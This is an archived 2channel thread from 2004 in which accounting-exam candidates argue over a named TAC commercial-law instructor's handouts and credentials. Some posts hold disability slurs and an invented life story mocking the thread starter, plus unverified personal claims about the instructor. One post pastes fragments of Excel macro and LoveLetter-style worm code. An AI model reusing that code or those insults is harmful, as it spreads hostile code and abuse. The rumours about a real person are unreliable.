2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(受からん)阿部太郎限界説(だろ?)

1 :タックお願い:04/02/11 11:36 ID:TQxcc7Lp


   ってゆうかあのレジュメじゃぜっっったいうからん●
 誤植多いし、年々内容が無茶苦茶になってる…(二回目受験)第一やる気がかんじられない…

2 :一般に公正妥当と認められた名無しさん:04/02/11 11:40 ID:???
2get

3 :阿部太朗:04/02/11 23:23 ID:???
阿部太郎じゃなくて阿部太朗だよ

4 :一般に公正妥当と認められた名無しさん:04/02/12 00:30 ID:yXL8+5gI
TACで商法はコイタンだって

5 :一般に公正妥当と認められた名無しさん:04/02/12 00:30 ID:???
>>1
そうなの?おれは一度も受けたことないからよくわからん。
こいたん一筋

6 :一般に公正妥当と認められた名無しさん:04/02/12 00:34 ID:4i7OcB/n
しかし、レジュメで授業を進める以上、テキストに劣らない完成度の高いレジュメを
提供してほしいものですな。
あっ、タックのテキストを基準に考えないでね。

7 :一般に公正妥当と認められた名無しさん:04/02/12 04:16 ID:???
レジュメで授業を進めるのは講師の能力が低いからです。


8 :l:04/02/12 07:20 ID:???
アタックのテキストは弥永作成

9 :一般に公正妥当と認められた名無しさん:04/02/12 07:44 ID:HXrhWGgL
「リーガルマインド会社法(TAC版)」ですね

10 :一般に公正妥当と認められた名無しさん:04/02/12 08:10 ID:???
攻めのコイタン、守りのアベタン。


11 :一般に公正妥当と認められた名無しさん:04/02/12 10:07 ID:S5Ld9ylE
答練を見る限りではとくに阿部で問題ないけどな、
去年の論文みたいなのは例外だと思うが。

12 :一般に公正妥当と認められた名無しさん:04/02/12 12:19 ID:dP2ACZx4
個人名のスレってまずいだろさすがに

13 :一般に公正妥当と認められた名無しさん:04/02/12 15:06 ID:???
>>1は先生から訴えられる悪寒。弁護士用意しといたほうがいいよ。

14 :一般に公正妥当と認められた名無しさん:04/02/12 20:58 ID:???
その答練の問題を作っているのが阿部じゃないのか

15 :一般に公正妥当と認められた名無しさん:04/02/12 23:10 ID:???
>>1
実際多くの受講生が阿部で受かってるよ。
商法はそこそこに、他の科目に時間かければ?そういうスタンスなんだろうし。

俺は小飯塚一筋だけど、あの人のレジュメも誤植多いし、去年と言いまわしや
構成違ってて2年目以降の人間としては勉強しにくい等、不満はあるよ。結局どっちもどっち

どの講師だからとぶーたれず、与えられた課題をこなせばいいんじゃないかな

16 :一般に公正妥当と認められた名無しさん:04/02/12 23:14 ID:???
>>15
まともすぎて誰も反論できません

17 :一般に公正妥当と認められた名無しさん:04/02/12 23:36 ID:???
>>15
君、いったいどういうつもりだね。

18 :一般に公正妥当と認められた名無しさん:04/02/13 00:32 ID:KEW22Wu9
15の言うことが全く正解なので誰も反論できず、これでおしまいですな

19 :一般に公正妥当と認められた名無しさん:04/02/13 00:48 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


20 :一般に公正妥当と認められた名無しさん:04/02/13 00:54 ID:???
TAC商法の看板講師が2人揃ってテキストを使わない。
テキストの存在意義は一体なに?

21 :一般に公正妥当と認められた名無しさん:04/02/13 02:11 ID:XgHsilb8
テキストの存在意義は入門は短答の前座、上級はインテリア。
つーか経済も使わないジャン

22 :一般に公正妥当と認められた名無しさん:04/02/13 03:35 ID:???
俺の本棚にあるまっさらなTAC商法テキストを見て、
両親が心配になって家族会議をしたらしいw
で親父が遠まわしに「勉強やってるか?」ときいてきた。

阿部レジュメはボロボロなのに〜 ヽ(`Д´)ノ

23 :一般に公正妥当と認められた名無しさん:04/02/13 07:42 ID:???
大谷とか、俺は好きだぞ。

24 :一般に公正妥当と認められた名無しさん:04/02/13 10:08 ID:???
レックのC-BOOKが一番いいのに。

25 :一般に公正妥当と認められた名無しさん:04/02/13 10:59 ID:???
阿部って、確か神戸大学だったよな?
関学のライバルか。どうりでヤクザみたいな下品な口の利き方する訳だ。

26 :一般に公正妥当と認められた名無しさん:04/02/13 11:46 ID:???
影の実力者赤根講師が最強。

27 :一般に公正妥当と認められた名無しさん:04/02/13 11:51 ID:???
神戸商船大学です。

28 :一般に公正妥当と認められた名無しさん:04/02/13 12:37 ID:mibKum16
>>1
就職浪人にならないで済む
感謝せなあかん

29 :一般に公正妥当と認められた名無しさん:04/02/13 18:48 ID:???
とりあえず、商法で大きいアドバンテージ取らないと受かれない状態の>>1
試験の限界にきてるということで。

30 :一般に公正妥当と認められた名無しさん:04/02/13 20:15 ID:???
>>19
自治厨ウゼー
代行からしか削除依頼できないヘタレが、偉そうな口聞くなよ!


余裕のないヤツは、おとなしく勉強しとけ
( ゚д゚)、ペッ


31 :一般に公正妥当と認められた名無しさん:04/02/13 21:14 ID:bfBPmQy5
阿部って司法試験合格してるの?
以前の雑談でなんか言ってたけど。

32 :名無しさん@お腹いっぱい。:04/02/13 21:39 ID:???
会計士受験生と結婚したらしい

33 :一般に公正妥当と認められた名無しさん:04/02/13 22:08 ID:Fk5AIOmb
茜先生っていいらしいね。

34 :一般に公正妥当と認められた名無しさん:04/02/14 00:59 ID:???
>>25
阿部も小飯塚も中法

35 :一般に公正妥当と認められた名無しさん:04/02/14 06:04 ID:???
>>34
それが有力説

36 :一般に公正妥当と認められた名無しさん:04/02/14 15:05 ID:???
         ,. -- 、.,,_
     ,. ‐'⌒:::::::::::::::::::: :ヽ、
   v'::::::::::::::: :::     .:::::ヽ、_  【痛い知障>>1=>>30の正体】
  .7::::::::::::::  .;ト、::::::::::::::::::::::::::ド
  /:::::::::  .::::::ハ!. \:::ト、|l::;::::::Z
 ;':: ;.  .:::::::ハ:|    '"⌒゙'l |ヘ  「へへへへへ・・・僕のネタ面白い」
 |:::::::::::::|.l:::レ'     r'⌒ .「l
  ';::::::::::;レ'  , =、       .|′
  〉;:::_:ト.  l′   , 、     ! 【知障データ】小学6年生(低学年並みの知能)
    |.ト.、     _,...:'^!  /、  特徴:知障知障知障知障知障知障知障知障
    ` ー'ヽ、   ヽ- '´,.イ   ヽ   趣味:2ちゃん(最悪板 ヲタ板 厨房板、等に常駐する)
      /  l`` ヽ‐-イ__」    |  
    /    ゙、  /`-、   l.ノ 〉
   ,'   、   ヽ '′トイ   .|-ァ'
    |     |      L.!   .|"|
  〈     リ         .! !
    't::;;‐;ァ'7ニ>  _,   〈 .l
   |   ハ -ゝ  ̄`" ̄/ ,.イ .|
   !  !ケー- 、_     _/ |_リ
    |.  l.,'  /   ̄ ̄レ' _」
   l.  l,ヽ     ,イ_,...,,]
   ヽ 、lzト、  / ,/ { ` l′
    ``´.l  ヽ/'´  .l   |
       l   ;′  .ド.r;久
       |   /    `ヽ、_,)
       ユこh       ` ´
       .| `'´j!
      ヾ=彳


37 :一般に公正妥当と認められた名無しさん:04/02/14 17:30 ID:UoTl+wHv
商法の阿部先生か槙先生の講義、どちらを受講しようか迷ってます。
皆さんなら、どちらの先生にします?

38 :一般に公正妥当と認められた名無しさん:04/02/14 17:37 ID:40imkU2K
阿部が会計士受験生の商法のレベルを下げてくてるうちに
他の先生で受かればいいじゃん

39 :一般に公正妥当と認められた名無しさん:04/02/15 20:30 ID:xgEwOpKK
まぁ、実際一発合格してるようなヤシは阿部オンリーだけどね。

40 :]:04/02/15 22:54 ID:6x0Isd8y

みんなあの大量の誤植にどお対応してるの?

41 :一般に公正妥当と認められた名無しさん:04/02/16 11:41 ID:TQ4wWR+J
>>39 おまえな〜、それは一発合格したやつがスゴイだけだろ
だいたい一発合格者は阿部オンリーって根拠はあるの?

42 :一般に公正妥当と認められた名無しさん:04/02/16 12:20 ID:???
阿部レジュメで短答本試験9問はとれる。満点とりたければ
パワーアップ申込んだり、問題集買ってときまくればいい。
論文は阿部商法で落ちない答案を書くことは可能だと思います。
商法で上位5%以内に入りたければ小飯塚が必要となるかも。


43 :一般に公正妥当と認められた名無しさん:04/02/16 12:47 ID:duVT4KvW
去年のことは忘れて阿部を信じようぜ。

44 :一般に公正妥当と認められた名無しさん:04/02/16 13:56 ID:JKqayYqQ
何年か前、短刀の解答速報間違ったのって阿部ですか?

45 :一般に公正妥当と認められた名無しさん:04/02/16 19:51 ID:???
別にあべを擁護する気はさらさらないが(なんの特にもならんしな)
会計士試験における商法の重要性の低さを考えれば
あべで十分対応できると思うんだがな。

「商法でミスって落ちた」やつはいるだろうが
阿部の授業を受けているから
「商法の実力がつかずに合格答案が書けず他の講師を受講してる連中に負けた」
っていうやつはそんなにいないんじゃねーの。

46 :一般に公正妥当と認められた名無しさん:04/02/16 23:20 ID:???
結局、あれだろ、本当は勉強していない自分が悪いのに、それを認めるのが癪なもんだから
阿部にケチを付けているだけだろ。

文句があるなら別の講師なり予備校に変えればいい。

47 :一般に公正妥当と認められた名無しさん:04/02/17 01:02 ID:n8DYX9gT
商法ってみんなどんな勉強してるの?

48 :]:04/02/17 23:30 ID:zNlzwNH6

あの、夏上級なんですけど、合併の株式かいとり請求権がなぜあべれじゅめには
のってなのだ????

49 :一般に公正妥当と認められた名無しさん:04/02/17 23:33 ID:???
買取請求したくないから。
てか、それくらい既知ということだ。
受からんぞ、それじゃ。

50 :]:04/02/17 23:34 ID:zNlzwNH6

 てゆうか、なぜのせてないのかがしりたい。手抜きか…

51 :一般に公正妥当と認められた名無しさん:04/02/17 23:38 ID:njgo+EFx
関東はワタナベ先生いないから大変やね

52 :一般に公正妥当と認められた名無しさん:04/02/17 23:39 ID:???
おまえ、糞スレ立ててる暇あったら勉強しろ

53 :一般に公正妥当と認められた名無しさん:04/02/18 10:38 ID:???
阿部れじゅめは論点集だよ。基礎知識は当然知っているものとして割愛
してある。1回目の講義でも言ってたし。条文レベルの知識は条文を
参照するか、パワーアップをとりましょう。

54 :一般に公正妥当と認められた名無しさん:04/02/18 21:56 ID:???
>>1
プレゼント
http://2style.net/maido/R3_temp.swf?inputStr=%8E%A9%8D%EC%8E%A9%89%89%82%C5%83N%83%5C%83X%83%8C%82%F0%8F%E3%82%B0%82%C4%95K%8E%80%82%BE%82%C8%81B

55 :一般に公正妥当と認められた名無しさん:04/02/20 22:51 ID:iUDoX1oB
渡部、顔やばいぞ

56 :一般に公正妥当と認められた名無しさん:04/02/20 23:57 ID:fjwjBJQe
結局アベは司法受かってるの?
諸説飛び交ってるよね

57 :一般に公正妥当と認められた名無しさん:04/02/21 00:11 ID:???
阿部は中大法卒。司法崩れ(LEC)を経てTACの講師に。
小飯塚も中大法卒。民間企業に就職。会計士と結婚して退職。そしてTAC講師に。2次試験合格。
これが真実。もうええやろ、このネタええ加減うざい。

58 :一般に公正妥当と認められた名無しさん:04/02/21 00:44 ID:???
会計士を目指す方へ
期間限定、お得な情報。
http://cgi.f13.aaacafe.ne.jp/~chama/a13_0015.txt

59 :一般に公正妥当と認められた名無しさん:04/02/21 01:29 ID:d72cLcW7
>>58 これクリックするとなんか変なことになるぞ!!
注意!!!

60 :一般に公正妥当と認められた名無しさん:04/02/21 02:26 ID:AeEsxS7C
あべちゃん司法試験受かってるよ。
っていうかあべちゃんと呑んだことある人なら知ってるでしょ?
あの人よく生徒と酒飲んでるじゃん。

61 :一般に公正妥当と認められた名無しさん:04/02/21 07:05 ID:???
57が真実を言っちゃった。

62 :一般に公正妥当と認められた名無しさん:04/02/21 07:09 ID:???
まあ、超一流大を出て、司法試験に合格して、会計士の法律講座の講師をしてたらアホだよな。
司法試験講座ならまだしも。

63 :一般に公正妥当と認められた名無しさん:04/02/21 12:17 ID:eWVeWHv/
57と60どっちが真実?

64 :一般に公正妥当と認められた名無しさん:04/02/21 14:31 ID:???
あべたんは司法合格済み。こいたんは会計士補のままだったと思います。

65 :一般に公正妥当と認められた名無しさん:04/02/21 14:40 ID:LL8EsGOS
題が理解できない。

一番多くの合格者を輩出しているのは、彼であるんだから。

66 :一般に公正妥当と認められた名無しさん:04/02/21 18:13 ID:???
57が真実。

67 :一般に公正妥当と認められた名無しさん:04/02/21 20:45 ID:???
誰か付き合ってください。
http://profiles.yahoo.co.jp/mami_chuchu

68 :一般に公正妥当と認められた名無しさん:04/02/21 21:41 ID:fMKM1ST6
結局司法受かってないんだ。
アベってあんまり頭良さそうじゃないもんな


69 :一般に公正妥当と認められた名無しさん:04/02/21 22:19 ID:???
>一番多くの合格者を輩出しているのは、彼であるんだから。

Vや通信は彼が主なんだから多いのは普通では?


要は自分だろ?講師のせいにするなよ。お前ら。みっともない。

70 :一般に公正妥当と認められた名無しさん:04/02/21 22:24 ID:???
>>69
NGワードです。

71 :一般に公正妥当と認められた名無しさん:04/02/21 23:18 ID:???
          ____
         /:::::::::::::::::::::\
       /::::::::::::::::::::::::::::::::\
       |:::::::::::|_|_|_|_|_|
       |_|_ノ∪ \,, ,,/ ヽ
       |::( 6  ー─◎─◎ )  
        |ノ  (∵∴∪( o o)∴)
       |   <  ∵   3 ∵)
     /\ └    ___ ノ
       .\\U   ___ノ\
         \\_>>1_)  ヽ

--------------->>1の経歴-------------------------------------
小学校:病弱で「デブ」「ブタ」「オタク」といじめられつつも卒業。
中学校:中2のとき凄惨ないじめにあって自殺未遂を犯す。
高校:高1のときクラスの不良のリーダー格に標的にされる。
  以後、周辺の不良にリンチをくらう、中学時代のいじめっ子にも駅で待ち伏せされ金を取られる日々。
  高2の3学期までギャルゲーしかせず、留年しかけて学年末試験で猛勉強するも、平均57.3点止まり、
  担任の先生に呼び出されて「おまえ就職か?」と言われ、頭に来て担任にナイフを刺して停学。しかし留年は免れる。
  高3のときは悲しく半引きこもり(部活にも入ってない)で成績も常に平均以下で卒業。
浪人:予備校を前期で辞めて、ひたすら2ちゃんねる。学力が落ちる。
大学:なんとか中堅の私立大学に補欠合格しかしアキバにばかり行ってたので
   単位が足らず強制退学。
ヒッキー期間:8ケ月、現在進行中!!



72 :一般に公正妥当と認められた名無しさん:04/02/22 23:11 ID:???

ゴクローサン
楽しいか?

73 :一般に公正妥当と認められた名無しさん:04/02/23 22:42 ID:???
絶対に一度は見ておけよ。
http://www.albinoblacksheep.com/flash/you.html



74 :一般に公正妥当と認められた名無しさん:04/02/24 19:51 ID:F5IN5EzE
今日の応用答練に色々書いてあったな、先生見ているんじゃねーの、
先生受かったら可愛いおねーちゃんのいるお店に連れてってね。

75 :一般に公正妥当と認められた名無しさん:04/02/24 20:58 ID:???
>>74
詳細キボンヌ


76 :一般に公正妥当と認められた名無しさん:04/02/24 22:44 ID:???
応用答練の2回目でガム噛みながら喋ってなかったか?

77 :一般に公正妥当と認められた名無しさん:04/02/25 00:16 ID:l8ms7b6H
分からなかった、正直映像はあまり見ないし、
応用といっても簡単だよな、Bレジュメのおかげでかなーり商法出来る様になったぞ。

78 :一般に公正妥当と認められた名無しさん:04/02/25 00:25 ID:???
>>73
こういうの好きよ!!

79 :一般に公正妥当と認められた名無しさん:04/02/25 08:52 ID:???
hosyu

80 :一般に公正妥当と認められた名無しさん:04/02/25 23:40 ID:2IYC5Fkk
ねぇ16年版の六法買ってる奴がけっこういるけど、買い換えたほうがいいのかな?
15年版の六法持ってるんだけど、今日受けた商法応用1回目の自己株の211の3の1項って
1号2号に分かれてないんだけど、解答には1号2号分かれて論述されてるので、

試験用条文集をそのうち買うことになるから別いいのかなぁ?




81 :一般に公正妥当と認められた名無しさん:04/02/26 00:03 ID:???
ケチってたら、合格するものもできないぞ。
けちけちしたいなら、16年度を持ってるやつから、コピーさせてもらえ。

82 :一般に公正妥当と認められた名無しさん:04/03/03 07:29 ID:???
        ,,,--─===─ヽ/へ
      /iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
     iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
    iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
   iiiiiiiiiiiiiiiiii/             \iiiiiiiゞ
   iiiiiiiiiiii/                \iiヽ     
  iiiiiiiiiiiiiii《    ━━━'/  ヽ━━━ ヽミヽ
 ...iiiiiiiiii彡/      __,.::  :: __  ヽiiiii|
 ..iiiiiiiiiiiii》|             :::      |iiiii|
 iiiiiiiiiiiiiiii|,                     |iii|
..iiiiiiiiiiiiiiiiii,         ( ● ● )      .|iiii|  商法 商法 ♪
iiiiiiiiiiiiiiiiiiiiiii       》━━━━《       |iiiii|   しょほ しょほ 商法 ♪
iiiiiiiiiiiiiii《《《ヽ     》 / ̄ ̄\ 《     |iiiiiiii|     朝から商法 ♪
iiiiiiiii《《《《《《《《    《《 \ ̄ ̄/ 》》   |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》   ̄ ̄  《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii



83 :一般に公正妥当と認められた名無しさん:04/03/03 19:41 ID:???
キタァァァ(゚∀゚)ァ( ゚∀)ァ( ゚)ァ( )ァ(` )ハァ(Д`)ハァ(;´Д`)ハァハァ
http://amilala.blogspot.com

84 :一般に公正妥当と認められた名無しさん:04/03/03 23:13 ID:k8C1odIf
>>82
omoshiroi

85 :一般に公正妥当と認められた名無しさん:04/03/03 23:30 ID:GHYff3KE
>>82
つかの間の笑いをありがとう。ご苦労さん

86 :一般に公正妥当と認められた名無しさん:04/03/04 00:21 ID:???
今日、友達の待ちあわせの時間つぶしで本屋に寄った。
いわゆる商法の基本書でも読んでみよう、と立ち読みした。
いろいろな学説や受験商法の絡みの結果、抜粋したものがアベレジュメになってたんだな。
学説の背景が少しわかって面白かった。
基本書は受験用の知識として近道とは言えないが、興味や意欲を補完するのには意外と
プラスになると思った。

87 :一般に公正妥当と認められた名無しさん:04/03/10 19:51 ID:J5Bfkz+X
今でもレジュメに、ボーイミーツガール、とか書いてんの?

88 :一般に公正妥当と認められた名無しさん:04/03/11 11:51 ID:26hluusP
この間答練出たのだが、先生はデーブに似てるね。

89 :一般に公正妥当と認められた名無しさん:04/03/11 13:45 ID:ebOMvoNG
>>58
通報しました

90 :一般に公正妥当と認められた名無しさん:04/03/16 13:40 ID:3tl45/8z
就職浪人に受講料を返還する良心的な会計士専門学校があれば教えてください

91 :一般に公正妥当と認められた名無しさん:04/04/06 01:57 ID:bzcfui01
阿部レジュメで少し分からないところがあって、どうせならと大学図書館で一般向け・専門向け
両方で調べてみたのよ。
そしたら、商法の解釈って実はすごい融通きくんだな。
講義だと代取の無権代表だと利益衡量説・判例の2つぐらいだけど、その間にいろんな論理展開や
結論がありうるみたい。こんなの点数来るの?ってぐらいの(初めて見る)論理構成→結論があったりした。
答練でたまに全然ちがう結論書いちゃっても意外と点が来たりするのはこのためかもしれない。

最終的な結論より、引用条文や論理構成を整えるのが大事なんだね。

92 :一般に公正妥当と認められた名無しさん:04/04/06 08:06 ID:???
>>91
馬鹿発見

93 :一般に公正妥当と認められた名無しさん:04/04/06 11:08 ID:???
>>91
少数説を唱えても点数低いだろ。
試験は競争なんだから支持する説が違ったらそれだけで不利だ。

94 :一般に公正妥当と認められた名無しさん:04/04/06 11:57 ID:???
91はヴェテ当確

95 :一般に公正妥当と認められた名無しさん:04/04/06 12:44 ID:???
>>93 答練ではね、採点者のレベル低いから

96 :一般に公正妥当と認められた名無しさん:04/04/06 14:40 ID:???
あべは平均点ねらいのスタンスだろ。いまでいいじゃん
漏れ商法苦手だからすげえ助かってる

97 :一般に公正妥当と認められた名無しさん:04/04/06 16:10 ID:???
つーか商法は阿部レジュメを押さえて無難な解答しとけば平均以上は取れる。
あとは簿記と原計でどこまで高得点取れるかで勝負が決まる。

98 :一般に公正妥当と認められた名無しさん:04/04/06 16:19 ID:???
>>97 アホや、完全にタックのワナにはまってる

99 :一般に公正妥当と認められた名無しさん:04/04/06 16:43 ID:???
>>98
はぁ?
頭悪ィんかおまえw

100 :一般に公正妥当と認められた名無しさん:04/04/06 16:47 ID:???
>>99 盲目的にタックを信じてやってくれよ
3,4年後には受かるからさ

101 :一般に公正妥当と認められた名無しさん:04/04/06 18:45 ID:???
まだ3,4年後に受かるならいいね。
俺なんか・・・

102 :一般に公正妥当と認められた名無しさん:04/04/06 18:54 ID:???
個人名で、しかも名誉を傷つけるようなスレタイはヤバイだろ。
「絶対うからん」とかかいてるけどこれはもっとヤバイだろ。
業務妨害・名誉毀損で訴えられるんじゃねーの?
ヤバ伊予ヤバイよ。1ヤバイよ。削除以来だしとけよ。


103 :一般に公正妥当と認められた名無しさん:04/04/06 19:00 ID:???
>>1
タックの受け付けメールにこのスレのアド載せて、「これは本当ですか?」って質問してもいいかい?

104 :一般に公正妥当と認められた名無しさん:04/04/06 19:05 ID:???
>年々内容が無茶苦茶になってる…(二回目受験)
二回目で年々って言うか?

105 :mahkun:04/04/06 22:02 ID:wadQMUQd
でも、漏れは去年阿部のせいで、短刀商法6点、総合35点だった。責任
取れ。

106 :一般に公正妥当と認められた名無しさん:04/04/06 22:22 ID:9D3guYbj
担当なんか講師うんぬんじゃなくて自分の力でどうにでもなるだろ!って思ってる入門上がりです

107 :一般に公正妥当と認められた名無しさん:04/04/06 23:48 ID:PmRZRBfU
豚に真珠

ベテに阿部レジュメ



108 :一般に公正妥当と認められた名無しさん:04/04/07 03:31 ID:???
tumaranasugi

109 :一般に公正妥当と認められた名無しさん:04/04/07 21:05 ID:???
アベって司法受かってないもん
クソだよ

110 :よしくん:04/04/07 21:30 ID:/D0RKSEt
漏れは阿部のレジュメはいいと思う。まあ、商法なんて落ちない程度
に勉強すれば十分。第一、商法を戦略科目にする香具師はいない。
また、商法の出題者も司法試験より格下のたかが公認会計士試験に
マジで採点すると思えないし。

111 :一般に公正妥当と認められた名無しさん:04/04/07 23:02 ID:???
本当、いままで受かってるんだから平気だよ。
1は自分が低脳なのをアベちゃんのせいにしてるだけ

112 :一般に公正妥当と認められた名無しさん:04/04/08 01:58 ID:???
よしくんの主観を発表されてもな


113 :一般に公正妥当と認められた名無しさん:04/04/08 02:35 ID:TCMD4cCk
だから去年のことは忘れろ、あれは例外だ、今年はあんなことはないと信じるんだ。

114 :一般に公正妥当と認められた名無しさん:04/04/08 15:21 ID:???
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10

End Sub

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

THE END!!



115 :一般に公正妥当と認められた名無しさん:04/04/08 18:01 ID:???
>>113
去年は何があったの?

116 :000:04/04/09 23:55 ID:syNOifgm
郡山さん、今井さん、高遠さんを見殺しにするな!!!!!!!!!!!!!!!!

もう時間がありません。

あらゆる立場を乗り超え、スレ違いを乗り越え、
郡山さん、今井さん、高遠さんの命を救うため、
われわれに出来る限りのことをしましょう。

そこで提案ですが、2ちゃんねる全体を、
郡山さん、今井さん、高遠さんの救出スレ、書き込み、
もしくは自衛隊のイラク撤退を呼びかけるスレで埋め尽しましょう。
そして自衛隊のイラク派遣を支持するあらゆる団体に抗議のメールを送りましょう。
われわれが声をあげればきっと彼らを救うことができるはずです。



117 :一般に公正妥当と認められた名無しさん:04/04/10 00:04 ID:???
未成年者はともかく、
他の2人は自己責任だろ。

ハイリターン(名声・他人の取れない写真)をねらったんだから、
ハイリスクを負うのは当然。

なんて、どうでも良いけど、ランキング1位ですな・・。
http://startpage-cpa.com/cgi-bin/votec/votec.cgi?no=215

118 :一般に公正妥当と認められた名無しさん:04/04/10 00:04 ID:nbM2GqI+
自己責任

119 :一般に公正妥当と認められた名無しさん:04/04/10 00:33 ID:???
3馬鹿のせいで10万損した。

120 :一般に公正妥当と認められた名無しさん:04/04/10 01:59 ID:???


rtsp://shared.streaming.telefonica.de/spiegel/video/4052.rm


121 :一般に公正妥当と認められた名無しさん:04/04/10 02:03 ID:???
>>117
7位のZ武って誰だ!?

122 :一般に公正妥当と認められた名無しさん:04/04/10 03:16 ID:???
阿部さんバリバリの右翼っていってたからぶち切れだろうな3バカには

123 :一般に公正妥当と認められた名無しさん:04/04/10 08:48 ID:???
法律学は説得の学問です。

124 :一般に公正妥当と認められた名無しさん:04/04/10 22:07 ID:CPWAJEgG
>>97
こんなやつが簿記原型で点取れてるとは思えない。
周りの頭いいやつと同じように自分も頭いいと思っちゃう救い用のないタイプ
同時にあなたのおかげでタックの自習室は、レク大原が使い安いのでかんしゃもしとります

125 :一般に公正妥当と認められた名無しさん:04/04/10 22:37 ID:LVN7F/+j
ダメだ、ダメだ、って書いてる人に聞きたい。いったいどこがダメなのか、
何がダメなのか、そういうことを人を納得させられるレベルで教えてください。
直感とか感情で言ってる限り、まったく説得力がありません。
イラクで人質とられた親たちの発言と同レベルですね。

126 :一般に公正妥当と認められた名無しさん:04/04/10 22:50 ID:CPWAJEgG
>>125
本屋行って司法の問題集見てみ
他のとこはちゃんと模範解答作れる授業するよ

お前じゃ何が違うかもわからんかもしれんがな

127 :一般に公正妥当と認められた名無しさん:04/04/10 23:33 ID:LVN7F/+j
>126
やはりその程度の反論しかできないでしょうね。
感情的になりなさんな。
>>お前じゃ何が違うかもわからんかもしれんがな
これじゃあ誰も何もわかりませんよ。
どこに説得力があるのですか?



128 :一般に公正妥当と認められた名無しさん:04/04/11 00:55 ID:ZSb89f5A
商法ごときでウダウダ言う奴は永遠に受からない。

129 :一般に公正妥当と認められた名無しさん:04/04/11 01:25 ID:zdZggDdy
合格したかったら、簿記・経済・監査・財表だけやっとけ。

それで受かる。

130 :一般に公正妥当と認められた名無しさん:04/04/11 05:09 ID:6JH1p86y
それはない。

131 :一般に公正妥当と認められた名無しさん:04/04/16 09:34 ID:OCr6Ckdp
>>109
あべたんは司法うかってますよ。
もち会計士もうかってます。
つまりダブルライセンス。

講義がびみょーでも、話が面白いので許す。

132 :一般に公正妥当と認められた名無しさん:04/04/16 09:48 ID:???
??????????

133 :一般に公正妥当と認められた名無しさん:04/04/16 10:51 ID:???
>92〜94は論文落ちベテと見た。元試験委が言ってたけど,唱えた説が少数なのか
多数なのかは問題にならない。ただ、少数説は論証するのに手数がかかるから
少しでも漏れがあると論理構成がおかしくなって結果ボロボロになるだけ。
採点でも構成と論証がきっちりされてなければ逆に方向があってても点は低い。
自分は書けたと思って実は落ちるタイプだな。91が正解だよ。

134 :一般に公正妥当と認められた名無しさん:04/04/16 11:11 ID:???
そうなんだ。133さんありがとう。

135 :一般に公正妥当と認められた名無しさん:04/04/16 17:49 ID:???
>>131 だまされてるアホ発見

136 :よしくん:04/04/17 14:31 ID:QWH34v1B
民法典第三章 事務管理 第697条〜702条です。この掲示をご覧のすべての皆
さん!六法を見てください。しかとご覧下さい! 司法試験を勉強したことが
あるなら誰でも分かるでしょう!いいですか!無学文蒙なあなたのためにこん
な低次元な話をしたくないんだけど、法律用語で「事務管理」とは、一般的に
いうオフィスの事務管理とは全く意味が違いますよ!
法律用語での「事務管理」は「誰かを救出すること」です。
例えば私(甲)が勤務中に町を歩いていて、交通事故ではねられて意識不明の
重傷を負って倒れている人(乙)を見つけたとします。私(甲)には外国法人
との重要な商談の仕事があるにもかかわらず、人命救助のため止むを得ず、乙
を、とおりがかったタクシーに乗せ、一緒に病院に搬送したとします。このタ
クシー代2000円は私(甲)が負担しました。
そして、私(甲)はその事務管理行為のために3時間を費やしました。そして、
その遅刻のために取引先が、本国に帰国し、3000万円の商談がパーになってし
まいました。
このような場合、民法第702条に基づいて甲は、自らの事務管理行為費用の償
還を乙に請求できます。タクシー代2000円はもちろん乙に支払い義務がありま
す。また甲が自給2000円の労働者であった場合は、2000円×3時間=6000円の
費用額が査定され、また、パーになってしまった商談の機会損失を、乙は(判
例上その一部になると思われますが)請求があった場合支払わなければなりま
せん。
 民法典記載事項は一般法なので、仮に特別法がなくても、今回のイラクの件
の請求も法原は同様です。



137 :一般に公正妥当と認められた名無しさん:04/04/17 14:36 ID:???
↑なんか必死みたいだが、間違ってる。痛すぎw

138 :一般に公正妥当と認められた名無しさん:04/04/17 17:32 ID:???
あべは全答練の問題ばらしてたな
あそこまで言ったらさすがに誰でも気付くだろ

139 :一般に公正妥当と認められた名無しさん:04/04/18 06:16 ID:???
コイタンが司法受かってるとか嘘つくやつもいるけど目的はなんなの?

140 :一般に公正妥当と認められた名無しさん:04/04/18 07:53 ID:???
寝たいんだろう。

141 :一般に公正妥当と認められた名無しさん:04/04/19 02:27 ID:OsIvc9HV
寝たいよな (゚д゚)ハァハァ・・

142 :一般に公正妥当と認められた名無しさん:04/04/19 02:34 ID:OsIvc9HV
寝たいよな
(゚д゚)ハァハァ・・・

143 :一般に公正妥当と認められた名無しさん:04/04/19 17:28 ID:???
寝たい寝たい
(゚д゚)ハァハァ・・・

